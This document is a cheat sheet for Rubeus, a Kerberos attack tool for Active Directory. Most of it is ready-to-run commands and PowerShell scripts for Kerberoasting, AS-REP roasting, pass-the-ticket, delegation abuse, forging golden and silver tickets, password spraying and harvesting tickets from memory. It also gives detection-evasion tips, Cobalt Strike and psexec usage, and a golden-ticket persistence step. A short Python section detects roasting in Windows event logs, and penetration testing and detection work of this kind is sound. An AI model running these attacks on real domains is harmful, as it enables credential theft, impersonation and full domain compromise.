# Rubeus Kerberos Interaction Tool Cheat Sheet

## Overview

Rubeus is a C# toolset for raw Kerberos interaction and abuse. It is designed to attack Kerberos implementations and includes functionality for ticket requests, renewals, and various Kerberos-based attacks. Rubeus is particularly useful for Active Directory penetration testing and red team operations.

**Warning**: This tool is intended only for authorized penetration testing and security assessments. Ensure you have proper authorization before using it in any environment.
## Installation

### Precompiled Binary

```powershell
# Download from GitHub releases
Invoke-WebRequest -Uri "https://github.com/GhostPack/Rubeus/releases/download/v2.2.3/Rubeus.exe" -OutFile "Rubeus.exe"

# Verify download
Get-FileHash Rubeus.exe -Algorithm SHA256
```

### Build from Source

```bash
# Clone repository
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus

# Compile with Visual Studio or MSBuild
msbuild Rubeus.sln /p:Configuration=Release /p:Platform="Any CPU"

# Output will be in Rubeus/bin/Release/
```
### Alternative Download Methods

```powershell
# Using PowerShell
$url = "https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe"
$output = "C:\Tools\Rubeus.exe"
Invoke-WebRequest -Uri $url -OutFile $output

# Using curl (if available)
curl -L -o Rubeus.exe https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe
```
## Basic Usage

### Command Structure

```cmd
# Basic syntax
Rubeus.exe [command] [options]

# Get help
Rubeus.exe help

# Get help for specific command
Rubeus.exe [command] /help
```

### Available Commands
| Command | Description |
|---|---|
| asktgt | Request a TGT (Ticket Granting Ticket) |
| asktgs | Request a TGS (Ticket Granting Service) |
| askticket | Request a ticket for a specific service |
| renew | Renew a ticket |
| s4u | Perform S4U (Service for User) attacks |
| ptt | Pass-the-ticket attacks |
| purge | Purge tickets from memory |
| describe | Describe ticket contents |
| klist | List current tickets |
| dump | Dump tickets from memory |
| triage | Triage tickets |
| monitor | Monitor for new tickets |
| harvest | Harvest tickets |
| brute | Brute force passwords |
| kerberoast | Kerberoasting attacks |
| asreproast | AS-REP roasting attacks |
## Ticket Requests and Management

### TGT Request (Ticket Granting Ticket)

```cmd
# Request TGT with password
Rubeus.exe asktgt /user:username /password:password /domain:domain.com

# Request TGT with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com

# Request TGT with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com

# Request TGT for specific domain controller
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /dc:dc01.domain.com
```

### TGS Request (Ticket Granting Service)

```cmd
# Request TGS for specific service
Rubeus.exe asktgs /ticket:base64ticket /service:cifs/server.domain.com

# Request TGS with current user context
Rubeus.exe asktgs /service:cifs/server.domain.com

# Request TGS for multiple services
Rubeus.exe asktgs /service:cifs/server.domain.com,http/server.domain.com

# Request TGS with specific encryption
Rubeus.exe asktgs /service:cifs/server.domain.com /enctype:aes256
```

### Ticket Management

```cmd
# List current tickets
Rubeus.exe klist

# Describe ticket contents
Rubeus.exe describe /ticket:base64ticket

# Purge all tickets
Rubeus.exe purge

# Purge specific ticket
Rubeus.exe purge /luid:0x12345

# Dump tickets from memory
Rubeus.exe dump

# Dump tickets for specific user
Rubeus.exe dump /user:username
```
## Kerberoasting Attacks

### Basic Kerberoasting

```cmd
# Kerberoast all SPNs
Rubeus.exe kerberoast

# Kerberoast specific user
Rubeus.exe kerberoast /user:serviceaccount

# Kerberoast with specific encryption
Rubeus.exe kerberoast /enctype:rc4

# Kerberoast and save to file
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
```

### Advanced Kerberoasting

```cmd
# Kerberoast with LDAP filter
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*))"

# Kerberoast specific domain
Rubeus.exe kerberoast /domain:target.domain.com

# Kerberoast with specific domain controller
Rubeus.exe kerberoast /dc:dc01.domain.com

# Kerberoast with enterprise principals
Rubeus.exe kerberoast /enterprise
```

### Targeted Kerberoasting

```cmd
# Kerberoast specific SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433

# Kerberoast multiple SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433,HTTP/web01.domain.com

# Kerberoast with password policy bypass
Rubeus.exe kerberoast /pwdsetafter:01/01/2020

# Kerberoast high-value targets
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*)(adminCount=1))"
```
## AS-REP Roasting Attacks

### Basic AS-REP Roasting

```cmd
# AS-REP roast all users
Rubeus.exe asreproast

# AS-REP roast specific user
Rubeus.exe asreproast /user:username

# AS-REP roast and save to file
Rubeus.exe asreproast /outfile:asrep_hashes.txt

# AS-REP roast with specific format
Rubeus.exe asreproast /format:hashcat
```

### Advanced AS-REP Roasting

```cmd
# AS-REP roast with LDAP filter
Rubeus.exe asreproast /ldapfilter:"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"

# AS-REP roast specific domain
Rubeus.exe asreproast /domain:target.domain.com

# AS-REP roast with domain controller
Rubeus.exe asreproast /dc:dc01.domain.com

# AS-REP roast with credentials
Rubeus.exe asreproast /user:username /password:password /domain:domain.com
```
## Pass-the-Ticket (PTT) Attacks

### Basic Pass-the-Ticket

```cmd
# Pass-the-ticket with base64 ticket
Rubeus.exe ptt /ticket:base64ticket

# Pass-the-ticket from file
Rubeus.exe ptt /ticket:ticket.kirbi

# Pass-the-ticket to specific LUID
Rubeus.exe ptt /ticket:base64ticket /luid:0x12345

# Pass-the-ticket and create process
Rubeus.exe ptt /ticket:base64ticket /createnetonly:C:\Windows\System32\cmd.exe
```

### Advanced PTT Techniques

```cmd
# Pass multiple tickets
Rubeus.exe ptt /ticket:ticket1.kirbi,ticket2.kirbi

# Pass-the-ticket with service validation
Rubeus.exe ptt /ticket:base64ticket /service:cifs/server.domain.com

# Pass-the-ticket and inject into process
Rubeus.exe ptt /ticket:base64ticket /process:explorer.exe
```
## S4U (Service for User) Attacks

### S4U2Self Attacks

```cmd
# S4U2Self attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com

# S4U2Self with AES key
Rubeus.exe s4u /user:serviceaccount /aes256:aeskey /impersonateuser:targetuser /msdsspn:cifs/server.domain.com

# S4U2Self with ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com
```

### S4U2Proxy Attacks

```cmd
# S4U2Proxy attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http

# S4U2Proxy with multiple services
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http,ldap

# S4U2Proxy with existing ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http
```

### Constrained Delegation Abuse

```cmd
# Abuse constrained delegation
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com

# Abuse with protocol transition
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com /altservice:ldap /ptt

# Abuse with multiple hops
Rubeus.exe s4u /user:serviceaccount1 /rc4:hash1 /impersonateuser:administrator /msdsspn:cifs/server1.domain.com /altservice:cifs/server2.domain.com
```
## Golden and Silver Ticket Attacks

### Golden Ticket Creation

```cmd
# Create golden ticket
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519

# Create golden ticket with AES
Rubeus.exe golden /aes256:krbtgtaeskey /user:administrator /domain:domain.com /sid:S-1-5-21-...

# Create golden ticket with specific groups
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /groups:512,513,518,519,520
```

### Silver Ticket Creation

```cmd
# Create silver ticket
Rubeus.exe silver /rc4:servicehash /user:administrator /service:cifs/server.domain.com /domain:domain.com

# Create silver ticket with AES
Rubeus.exe silver /aes256:serviceaeskey /user:administrator /service:cifs/server.domain.com /domain:domain.com

# Create silver ticket for specific service
Rubeus.exe silver /rc4:servicehash /user:administrator /service:MSSQLSvc/sql01.domain.com:1433 /domain:domain.com
```
## Ticket Harvesting and Monitoring

### Ticket Harvesting

```cmd
# Harvest tickets from all sessions
Rubeus.exe harvest

# Harvest tickets with monitoring
Rubeus.exe harvest /interval:30

# Harvest tickets for specific user
Rubeus.exe harvest /user:administrator

# Harvest and save to file
Rubeus.exe harvest /outfile:harvested_tickets.txt
```

### Ticket Monitoring

```cmd
# Monitor for new tickets
Rubeus.exe monitor

# Monitor with specific interval
Rubeus.exe monitor /interval:60

# Monitor for specific users
Rubeus.exe monitor /filteruser:administrator,serviceaccount

# Monitor and save to file
Rubeus.exe monitor /outfile:monitored_tickets.txt
```

### Ticket Triage

```cmd
# Triage all tickets
Rubeus.exe triage

# Triage tickets for specific user
Rubeus.exe triage /user:administrator

# Triage with LUID filter
Rubeus.exe triage /luid:0x12345

# Triage and show service tickets only
Rubeus.exe triage /service
```
## Password Attacks

### Password Spraying

```cmd
# Password spray with single password
Rubeus.exe brute /password:Password123 /noticket

# Password spray with password list
Rubeus.exe brute /passwords:passwords.txt /noticket

# Password spray specific users
Rubeus.exe brute /users:users.txt /password:Password123 /noticket

# Password spray with domain
Rubeus.exe brute /password:Password123 /domain:domain.com /noticket
```

### Credential Validation

```cmd
# Validate credentials
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /getcredentials

# Validate with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com /getcredentials

# Validate with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com /getcredentials
```
## Advanced Techniques

### Cross-Domain Attacks

```cmd
# Request inter-realm TGT
Rubeus.exe asktgt /user:username /password:password /domain:child.domain.com /dc:dc01.child.domain.com

# Request cross-domain TGS
Rubeus.exe asktgs /service:krbtgt/parent.domain.com /domain:child.domain.com /ticket:base64ticket

# Golden ticket for child domain
Rubeus.exe golden /rc4:childhash /user:administrator /domain:child.domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519
```

### Unconstrained Delegation Abuse

```cmd
# Monitor for delegation tickets
Rubeus.exe monitor /targetuser:DC01$ /interval:5

# Extract TGT from delegation
Rubeus.exe dump /service:krbtgt /nowrap

# Use extracted TGT
Rubeus.exe ptt /ticket:extractedtgt
```

### Resource-Based Constrained Delegation

```cmd
# Abuse RBCD
Rubeus.exe s4u /user:controlledaccount /rc4:hash /impersonateuser:administrator /msdsspn:host/target.domain.com /altservice:cifs,http,ldap /ptt

# RBCD with computer account
Rubeus.exe s4u /user:COMPUTER$ /rc4:computerhash /impersonateuser:administrator /msdsspn:host/target.domain.com /ptt
```
## Evasion Techniques

### OPSEC Considerations

```cmd
# Use specific encryption types
Rubeus.exe kerberoast /enctype:aes256

# Avoid detection with delays
Rubeus.exe kerberoast /delay:5000

# Use specific domain controllers
Rubeus.exe kerberoast /dc:dc02.domain.com

# Limit requests
Rubeus.exe kerberoast /spn:specific/service.domain.com
```

### Stealth Operations

```cmd
# Request tickets without caching
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /ptt /luid:0x0

# Use alternative service names
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:user /msdsspn:cifs/server.domain.com /altservice:host

# Minimize ticket lifetime
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /endtime:01/01/2024
```
## Integration with Other Tools

### Mimikatz Integration

```cmd
# Export tickets for Mimikatz
Rubeus.exe dump /outfile:tickets.kirbi

# Use in Mimikatz
mimikatz # kerberos::ptc tickets.kirbi
```

### Impacket Integration

```bash
# Convert Rubeus tickets for Impacket
# Use ticket with impacket tools
export KRB5CCNAME=ticket.ccache
python3 psexec.py -k -no-pass domain.com/administrator@target.domain.com
```

### Cobalt Strike Integration

```cmd
# Cobalt Strike beacon commands
beacon> execute-assembly Rubeus.exe kerberoast
beacon> execute-assembly Rubeus.exe asreproast
beacon> execute-assembly Rubeus.exe dump
```
## Automation Scripts

### Comprehensive Kerberos Assessment

```powershell
# Comprehensive Kerberos assessment script
param(
    [string]$Domain = $env:USERDOMAIN,
    [string]$OutputPath = "C:\Temp\KerberosAssessment"
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

Write-Host "[+] Starting comprehensive Kerberos assessment for $Domain"

# Kerberoasting
Write-Host "[+] Performing Kerberoasting..."
& Rubeus.exe kerberoast /outfile:"$OutputPath\kerberoast.txt" /domain:$Domain

# AS-REP Roasting
Write-Host "[+] Performing AS-REP Roasting..."
& Rubeus.exe asreproast /outfile:"$OutputPath\asreproast.txt" /domain:$Domain

# Ticket triage
Write-Host "[+] Triaging current tickets..."
& Rubeus.exe triage | Out-File "$OutputPath\ticket_triage.txt"

# Dump tickets
Write-Host "[+] Dumping tickets..."
& Rubeus.exe dump | Out-File "$OutputPath\ticket_dump.txt"

Write-Host "[+] Assessment complete. Results saved to $OutputPath"
```
### Automated Ticket Harvesting

```powershell
# Automated ticket harvesting script
param(
    [int]$Interval = 300,   # 5 minutes
    [string]$OutputPath = "C:\Temp\TicketHarvest",
    [int]$Duration = 3600   # 1 hour
)

New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

$endTime = (Get-Date).AddSeconds($Duration)
$iteration = 1

Write-Host "[+] Starting ticket harvesting for $Duration seconds"

while ((Get-Date) -lt $endTime) {
    $timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
    # Backtick keeps "$iteration" and "_" from being parsed as one variable name
    $outputFile = "$OutputPath\harvest_$iteration`_$timestamp.txt"

    Write-Host "[+] Iteration $iteration - Harvesting tickets..."
    & Rubeus.exe harvest | Out-File $outputFile

    Write-Host "[+] Tickets saved to $outputFile"

    if ((Get-Date) -lt $endTime) {
        Write-Host "[+] Waiting $Interval seconds..."
        Start-Sleep -Seconds $Interval
    }

    $iteration++
}

Write-Host "[+] Ticket harvesting complete"
```
### Domain Reconnaissance Script

```powershell
# Domain reconnaissance with Rubeus
param(
    [string]$Domain,
    [string]$Username,
    [string]$Password,
    [string]$OutputPath = "C:\Temp\DomainRecon"
)

New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

Write-Host "[+] Starting domain reconnaissance for $Domain"

# Test credentials
Write-Host "[+] Testing credentials..."
$credTest = & Rubeus.exe asktgt /user:$Username /password:$Password /domain:$Domain /getcredentials
$credTest | Out-File "$OutputPath\credential_test.txt"

if ($credTest -match "TGT request successful") {
    Write-Host "[+] Credentials valid, continuing reconnaissance..."

    # Kerberoasting with credentials
    Write-Host "[+] Kerberoasting with credentials..."
    & Rubeus.exe kerberoast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\kerberoast_creds.txt"

    # AS-REP Roasting with credentials
    Write-Host "[+] AS-REP Roasting with credentials..."
    & Rubeus.exe asreproast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\asreproast_creds.txt"

    Write-Host "[+] Reconnaissance complete"
} else {
    Write-Host "[-] Credentials invalid, stopping reconnaissance"
}
```
## Troubleshooting

### Common Issues

```cmd
# Clock skew issues
w32tm /resync

# Network connectivity
nslookup domain.com
telnet dc01.domain.com 88

# Kerberos configuration
klist purge
klist

# DNS resolution
nslookup _kerberos._tcp.domain.com
```
### Debug Mode

```powershell
# Enable Kerberos logging
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters" /v LogLevel /t REG_DWORD /d 1

# View Kerberos events (4768 TGT requests and 4769 TGS requests are written
# to the Security log on the domain controller, not the System log)
Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4768 -or $_.Id -eq 4769}

# Check ticket cache
klist tickets
```
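As an added defensive counterpart to the Kerberoasting and AS-REP roasting sections above (example code written for this cheat sheet, not part of Rubeus), the following detection logic runs over constructed 4768/4769 event records and flags the two patterns those commands produce: a burst of RC4 service-ticket requests for many distinct SPNs from one account, and a successful TGT request with no pre-authentication. Field names follow the EventData of the Security events; the threshold and window are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real log data), shaped like the EventData fields of
# Security events 4768 (TGT request) and 4769 (TGS request) on a domain controller.
# TicketEncryptionType 0x17 = RC4-HMAC, 0x12 = AES256; PreAuthType "0" = no pre-auth.
SAMPLE_EVENTS = [
    {"EventID": 4769, "Time": "2024-03-01T10:00:01", "TargetUserName": "jsmith@DOMAIN.COM",
     "ServiceName": "MSSQLSvc/sql01.domain.com:1433", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "Time": "2024-03-01T10:00:03", "TargetUserName": "jsmith@DOMAIN.COM",
     "ServiceName": "HTTP/web01.domain.com", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "Time": "2024-03-01T10:00:04", "TargetUserName": "jsmith@DOMAIN.COM",
     "ServiceName": "CIFS/fs01.domain.com", "TicketEncryptionType": "0x17", "Status": "0x0"},
    # Service ticket for a computer account: excluded, machine accounts are not roastable
    {"EventID": 4769, "Time": "2024-03-01T10:00:05", "TargetUserName": "jsmith@DOMAIN.COM",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x17", "Status": "0x0"},
    # Normal AES service ticket for an ordinary user
    {"EventID": 4769, "Time": "2024-03-01T10:01:00", "TargetUserName": "adoe@DOMAIN.COM",
     "ServiceName": "CIFS/fs01.domain.com", "TicketEncryptionType": "0x12", "Status": "0x0"},
    # 4768 with no pre-authentication and RC4: the AS-REP roasting signature
    {"EventID": 4768, "Time": "2024-03-01T10:02:00", "TargetUserName": "svc_backup@DOMAIN.COM",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "PreAuthType": "0", "Status": "0x0"},
    # Normal TGT request: encrypted-timestamp pre-auth (type 2) and AES
    {"EventID": 4768, "Time": "2024-03-01T10:02:30", "TargetUserName": "jsmith@DOMAIN.COM",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "PreAuthType": "2", "Status": "0x0"},
]

RC4_HMAC = "0x17"

def detect_kerberoast(events, min_services=3, window=timedelta(minutes=5)):
    """Map each account to the distinct SPNs it requested RC4 service tickets for
    inside any sliding `window`, once that count reaches `min_services`."""
    requests = defaultdict(list)
    for e in events:
        if (e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC
                and not e["ServiceName"].endswith("$")):   # skip machine accounts
            requests[e["TargetUserName"]].append((datetime.fromisoformat(e["Time"]), e["ServiceName"]))
    hits = {}
    for user, reqs in requests.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):   # slide the window over time-ordered requests
            spns = {spn for t, spn in reqs[i:] if t - start <= window}
            if len(spns) >= min_services:
                hits[user] = sorted(spns)
                break
    return hits

def detect_asrep_roast(events):
    """Accounts that obtained a TGT without pre-authentication, encrypted with RC4."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e["Status"] == "0x0"
                   and e.get("PreAuthType") == "0" and e["TicketEncryptionType"] == RC4_HMAC})
```

Feed real events in by exporting the EventData fields from `Get-WinEvent -LogName Security` on the domain controller; the `/enctype:aes256` and `/delay` options in the Evasion section above are exactly the knobs that weaken these two rules, which is why an AES-only account baseline and per-account request counting over longer windows are the usual follow-ups.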
### Error Resolution

```cmd
# KDC_ERR_PREAUTH_FAILED
# Check username/password, account lockout

# KDC_ERR_C_PRINCIPAL_UNKNOWN
# Verify username format and domain

# KDC_ERR_S_PRINCIPAL_UNKNOWN
# Check SPN existence and format

# KRB_AP_ERR_SKEW
# Synchronize time with domain controller
```
## Best Practices

### Operational Security

- **Use legitimate accounts**: Avoid suspicious service accounts when possible
- **Limit requests**: Do not flood the domain controller with requests
- **Time synchronization**: Ensure time is synchronized to avoid clock skew
- **Clean up**: Remove injected tickets after operations
- **Monitor logs**: Be aware of the security events generated

### Attack Strategy

```cmd
# Start with reconnaissance
Rubeus.exe triage
Rubeus.exe klist

# Identify targets
Rubeus.exe kerberoast /stats
Rubeus.exe asreproast /stats

# Execute targeted attacks
Rubeus.exe kerberoast /user:specific_target
Rubeus.exe s4u /user:service /rc4:hash /impersonateuser:admin

# Maintain persistence
Rubeus.exe golden /rc4:krbtgt_hash /user:admin /domain:domain.com
```
## Resources

- [Rubeus GitHub Repository](LINK_5)
- [Kerberos Protocol Documentation](LINK_5)
- [Active Directory Security](LINK_5)
- [Harmj0y's Blog](LINK_5)
- [SpecterOps Blog](LINK_5)

*This cheat sheet provides a comprehensive reference for using Rubeus. Always ensure you have proper authorization before performing Active Directory security assessments.*